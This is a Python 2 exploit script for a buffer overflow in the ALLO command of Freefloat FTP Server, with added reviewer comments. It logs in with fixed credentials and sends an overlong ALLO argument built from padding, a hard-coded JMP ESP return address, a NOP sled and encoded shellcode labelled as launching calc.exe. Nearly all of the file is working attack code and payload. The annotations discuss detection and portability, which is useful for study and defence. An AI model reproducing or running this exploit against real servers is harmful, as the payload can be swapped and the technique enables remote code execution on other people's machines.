#!/usr/bin/python
# Exploit Title: Freefloat FTP Server ALLO Buffer Overflow Vulnerability
# Date: 2011 Aug 20
# Author: Black.Spook
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP2 EN
#
# Review notes on the structure of this listing (for readers studying it):
#   - Python 2 only: the `print "..."` statements below do not parse under
#     Python 3.
#   - The whole trigger is one FTP command: a log-in with fixed credentials
#     followed by a single "ALLO" whose argument is several hundred bytes
#     long.  From a detection standpoint that oversized ALLO argument is the
#     observable anomaly; ALLO normally carries a small decimal number.
#   - The buffer is the classic fixed-offset layout: 246 bytes of padding,
#     a 4-byte address, 200 NOP bytes, then the payload.  The address is
#     hard-coded for the tested platform named above, so the script is not
#     portable across Windows builds (inferred from the author's own comment
#     on `ret`; the source module of the address is not stated).

import socket
import sys


def usage():
    """Print the command-line synopsis and an example invocation."""
    # NOTE(review): the argument placeholders after the script name look
    # like they were lost when this listing was extracted (the example line
    # shows an address and a port); the strings are left exactly as found.
    print "usage : ./freefloatftp.py "
    print "example: ./freefloatftp.py 192.168.1.100 21"


# Socket is created before argument validation; on the usage/exit path
# below it is simply dropped without an explicit close().
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "\n"
print "#############################################################################"
print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #"
print "#############################################################################"
print "\n"

# Exactly two positional arguments are required; anything else prints the
# usage text and exits with status 0 (sys.exit() with no argument).
if len(sys.argv) != 3:
    usage()
    sys.exit()

ip = sys.argv[1]
port = sys.argv[2]  # kept as a string here; converted with int() at connect time

# 246 filler bytes ('A'); by the author's naming of the next value, this
# is presumably the distance to a saved return address — not verified here.
junk1 = "\x41" * 246
# Little-endian encoding of 0x7C941EED, which the author's comment
# identifies as a JMP ESP.  A fixed absolute address like this only holds
# for the exact module version it was taken from.
ret = "\xED\x1E\x94\x7C"  # 7C941EED JMP ESP
# 200 x86 NOP (0x90) bytes placed in front of the payload.
nop = "\x90" * 200

# windows/exec CMD=calc.exe
# (payload as described by the author's comment above; it is not decoded
# or verified here)
shellcode = ("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
             "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
             "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
             "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
             "\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
             "\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
             "\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
             "\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
             "\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
             "\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
             "\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
             "\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
             "\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
             "\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
             "\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
             "\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
             "\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
             "\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
             "\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
             "\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
             "\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
             "\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
             "\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
             "\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
             "\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
             "\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
             "\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
             "\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
             "\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
             "\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
             "\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
             "\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
             "\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
             "\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
             "\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
             "\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
             "\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")

# The complete ALLO argument: padding + address + NOP run + payload.
buff = junk1 + ret + nop + shellcode

try:
    # Parenthesised print of a single concatenated string is valid in
    # Python 2 as well, which is why this mixes with the statements above.
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip, int(port)))
    data = s.recv(1024)  # server greeting; read and discarded (data is never used)
    print("[-] Sending exploit...")
    # Fixed credentials.  Each reply is read only to keep the exchange in
    # step; the response codes are never checked, so a rejected login
    # does not stop the ALLO from being sent.
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    s.send("ALLO " + buff + "\r\n")
    s.close()
    # "Successfully sent" only means the send() calls returned; nothing
    # is read back after the ALLO, so the outcome on the server is unknown.
    print("[-] Exploit successfully sent...")
except:
    # Bare except: this also swallows a ValueError from int(port) on a
    # non-numeric port, KeyboardInterrupt, and any other error, reporting
    # all of them as a connection problem.  The socket is not closed on
    # this path.
    print("[-] Connection error...")
    print("[-] Check if victim is up.")